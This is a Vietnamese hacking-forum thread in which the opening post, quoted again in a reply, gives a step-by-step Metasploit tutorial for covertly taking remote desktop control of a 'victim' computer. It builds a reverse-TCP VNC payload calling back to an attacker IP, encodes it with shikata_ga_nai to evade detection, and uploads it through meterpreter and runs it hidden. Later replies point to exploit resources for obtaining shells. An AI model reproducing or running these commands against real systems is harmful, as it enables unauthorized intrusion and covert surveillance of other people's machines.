Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93 · 06/06/15, 12:06 PM

Có nhiều tùy chọn để có được quyền truy cập máy tính từ xa với một mục tiêu sẵn có. Để một tin tặc có thể tấn công nạn nhân từ phía sau tường lửa, netcat hỗ trợ điều này. Nhưng hôm nay tôi sẽ giới thiệu một lựa chọn đơn giản hơn là tận dụng " Metasploit reverse Virtual Network Computing (VNC) payload "

1. Đầu tiên chúng ta cài đặt vncviewer trên hệ thống máy tính của tin tặc.
Mã:
sudo apt-get install vncviewer
2. Next, we’ll start a new instance of msfconsole to wait for the VNC reverse-TCP connection
Mã:
msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST 74.208.19.32 LHOST => 74.208.19.32
msf exploit(handler) > set LPORT 8080 LPORT => 8080
msf exploit(handler) > exploit


[*]Handler binding to LHOST 0.0.0.0 
[*]Started reverse handler
[*]Starting the payload handler...
3. Next, we’ll create a new executable payload to launch the Metasploit reverse VNC payload, encoded with Shikata Ga Nai, as shown here
Mã:
$ ./msfpayload windows/vncinject/reverse_tcp LHOST=74.208.19.32 LPORT=8081 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o vncinject.exe
[*]x86/shikata_ga_nai succeeded with size 102 (iteration=1) 
[*]x86/shikata_ga_nai succeeded with size 129 (iteration=2) 
[*]x86/shikata_ga_nai succeeded with size 156 (iteration=3) 
[*]x86/shikata_ga_nai succeeded with size 183 (iteration=4)
Tin tặc sẽ chờ đợi nạn nhân mở vncinject.exe đã được mã hóa với Shikata Ga Nai nếu bạn đã có meterpreter shell bạn có thể upload nó đến máy nạn nhân và thực thi nó để truy cập đến máy tính từ xa.
Mã:
meterpreter > upload vncinject.exe C:TEMP 
[*]uploading
 
[*]uploaded

: vncinject.exe -> C:TEMP
 
: vncinject.exe -> C:TEMPvncinject.exe


 
meterpreter > execute -H -f C:TEMPvncinject.exe Process 7512 created.
Ngay lập tực sau khi thực thi vncinject.exe payload nạ nhân sẽ kết nối ngược trở lại đến msfconsole payload handler của tin tặc trên hệ thống tấn công của tin tặc sẽ khởi động vncviewer.

Một màn hình như ở dưới sẽ hiện ra trên máy tính của tin tặc

Hackerstudent93 · 30/05/20, 11:05 AM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

loạt bài tiếp theo mình sẽ viết những bài về hacking wifi nằm trong chương trình Hacking_Exposed_Wifi của tác giả " JOHNNY C A C H E JOSHUA WRIGHT
VINCENT LIU "

thuipro7409 · 06/06/15, 01:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

huynh có dạy hacker mũ trắng ko ạ em xin học ạ

thuipro7409 · 06/06/15, 01:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh nào hacker mũ trắng dạy em hacker được ko ạ

DDos · 06/06/15, 07:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

sao Anh Việt lẫn lộn thế ...

Hackerstudent93 · 06/06/15, 08:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

DDos;25868 nói:

sao Anh Việt lẫn lộn thế ...
Click to expand...

Cố tình để cho mọi người tự dịch và học tiếng anh mà @_@ DDos nhận em ở trên làm đệ tử đi nha

thuipro7409 · 06/06/15, 09:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh ddos nhận em làm đệ tử nha anh

thuipro7409 · 06/06/15, 09:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh hackerstudent93 nhận em được chứ sao ko anh

GinVN · 06/06/15, 10:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93;25869 nói:

Cố tình để cho mọi người tự dịch và học tiếng anh mà @_@ DDos nhận em ở trên làm đệ tử đi nha
Click to expand...

DDos;25868 nói:

sao Anh Việt lẫn lộn thế ...
Click to expand...

Hai caca chỉ bảo e vào ngành ATTT với ạ Hiện e chưa biết bắt đầu ntn. Em mới biết lập trình căn bản Pascal và C thôi ạ

thuipro7409 · 06/06/15, 10:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

war game em nghe nói học hacker bằng cái war game mà

zEpEr · 09/06/15, 09:06 AM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

== trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó

zEpEr · 09/06/15, 09:06 AM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân
Hackerstudent93;25860 nói:
Có nhiều tùy chọn để có được quyền truy cập máy tính từ xa với một mục tiêu sẵn có. Để một tin tặc có thể tấn công nạn nhân từ phía sau tường lửa, netcat hỗ trợ điều này. Nhưng hôm nay tôi sẽ giới thiệu một lựa chọn đơn giản hơn là tận dụng " Metasploit reverse Virtual Network Computing (VNC) payload "

1. Đầu tiên chúng ta cài đặt vncviewer trên hệ thống máy tính của tin tặc.
Mã:
sudo apt-get install vncviewer
2. Next, we’ll start a new instance of msfconsole to wait for the VNC reverse-TCP connection
Mã:
msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST 74.208.19.32 LHOST => 74.208.19.32
msf exploit(handler) > set LPORT 8080 LPORT => 8080
msf exploit(handler) > exploit

[*]Handler binding to LHOST 0.0.0.0 
[*]Started reverse handler
[*]Starting the payload handler...
3. Next, we’ll create a new executable payload to launch the Metasploit reverse VNC payload, encoded with Shikata Ga Nai, as shown here
Mã:
$ ./msfpayload windows/vncinject/reverse_tcp LHOST=74.208.19.32 LPORT=8081 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o vncinject.exe
[*]x86/shikata_ga_nai succeeded with size 102 (iteration=1) 
[*]x86/shikata_ga_nai succeeded with size 129 (iteration=2) 
[*]x86/shikata_ga_nai succeeded with size 156 (iteration=3) 
[*]x86/shikata_ga_nai succeeded with size 183 (iteration=4)
Tin tặc sẽ chờ đợi nạn nhân mở vncinject.exe đã được mã hóa với Shikata Ga Nai nếu bạn đã có meterpreter shell bạn có thể upload nó đến máy nạn nhân và thực thi nó để truy cập đến máy tính từ xa.
Mã:
meterpreter > upload vncinject.exe C:\\TEMP 
[*]uploading
 
[*]uploaded

: vncinject.exe -> C:\TEMP
 
: vncinject.exe -> C:\TEMP\vncinject.exe


 
meterpreter > execute -H -f C:\\TEMP\\vncinject.exe Process 7512 created.
Ngay lập tực sau khi thực thi vncinject.exe payload nạ nhân sẽ kết nối ngược trở lại đến msfconsole payload handler của tin tặc trên hệ thống tấn công của tin tặc sẽ khởi động vncviewer.

Một màn hình như ở dưới sẽ hiện ra trên máy tính của tin tặc
Click to expand...
==' trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit lấy meterpreter> ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó

DDos · 10/06/15, 12:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

zEpEr;25909 nói:

==' trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit lấy meterpreter> ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó
Click to expand...

Các bạn có thể tham khảo một vài exploit để lấy meterpreter....

https://goo.gl/wCeUcu

Hackerstudent93 · 11/06/15, 11:06 AM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

DDos;25922 nói:

Các bạn có thể tham khảo một vài exploit để lấy meterpreter....

https://goo.gl/wCeUcu
Click to expand...

Ddos up lại cái link cho mọi người tham khảo nhé

DDos · 11/06/15, 01:06 PM

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93;25934 nói:

Ddos up lại cái link cho mọi người tham khảo nhé
Click to expand...

https://www.youtube.com/playlist?list=PLgmq2kEqEXo_5pVD7D1q_ev65iyPesv3_

Đăng nhập | Đăng ký

Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93 VIP Members

Hackerstudent93 VIP Members

thuipro7409 W-------

thuipro7409 W-------

DDos Administrators Thành viên BQT

Hackerstudent93 VIP Members

thuipro7409 W-------

thuipro7409 W-------

GinVN W-------

thuipro7409 W-------

zEpEr Wh------

zEpEr Wh------

DDos Administrators Thành viên BQT

Hackerstudent93 VIP Members

DDos Administrators Thành viên BQT

Đăng nhập | Đăng ký

Tìm kiếm hữu ích

Diễn đàn

Thành viên

Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93 VIP Members

Hackerstudent93 VIP Members

thuipro7409 W-------

thuipro7409 W-------

DDos Administrators Thành viên BQT

Hackerstudent93 VIP Members

thuipro7409 W-------

thuipro7409 W-------

GinVN W-------

thuipro7409 W-------

zEpEr Wh------

zEpEr Wh------

DDos Administrators Thành viên BQT

Hackerstudent93 VIP Members

DDos Administrators Thành viên BQT